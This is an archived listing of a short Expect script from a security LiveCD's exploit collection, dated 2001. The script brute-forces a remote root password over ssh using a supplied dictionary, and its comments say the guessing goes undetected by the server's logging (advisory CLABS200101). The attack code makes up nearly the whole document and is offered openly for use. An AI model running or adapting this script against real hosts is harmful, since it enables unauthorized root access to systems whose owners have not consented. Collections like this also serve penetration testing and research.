home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ssh / openssh / ssh1-log-exp < prev    next >
Text File  |  2005-02-12  |  726b  |  29 lines

  1. #!/usr/bin/expect -f
  2. #
  3. # simple expect exploit to brute force root's password via ssh without
  4. # detection.. see CLABS200101 for info on this exploit.
  5. #
  6. # this is beerware, just buy me a beer at defcon if you like this.
  7. # build your own dictionary, use at your own risk, no warranty, etc.
  8. #
  9. # jose@crimelabs.net        january, 2001
  10. #
  11. set timeout 3
  12. set target [lindex $argv 0]
  13. set dictionary [lindex $argv 1]
  14.  
  15. if {[llength $argv] !=  2} {
  16.    puts stderr "Usage: $argv0 root@target dictionary\n"
  17.    exit }
  18.  
  19. set tryPass [open $dictionary r]
  20.  
  21. foreach passwd [split [read $tryPass] "\n"] {
  22.   spawn ssh $target
  23.   expect ":"
  24.   send "$passwd\n"
  25.   expect "#" { puts "password is $passwd\n" ; exit }
  26.   set id [exp_pid]
  27.   exec kill -INT $id
  28. }
  29.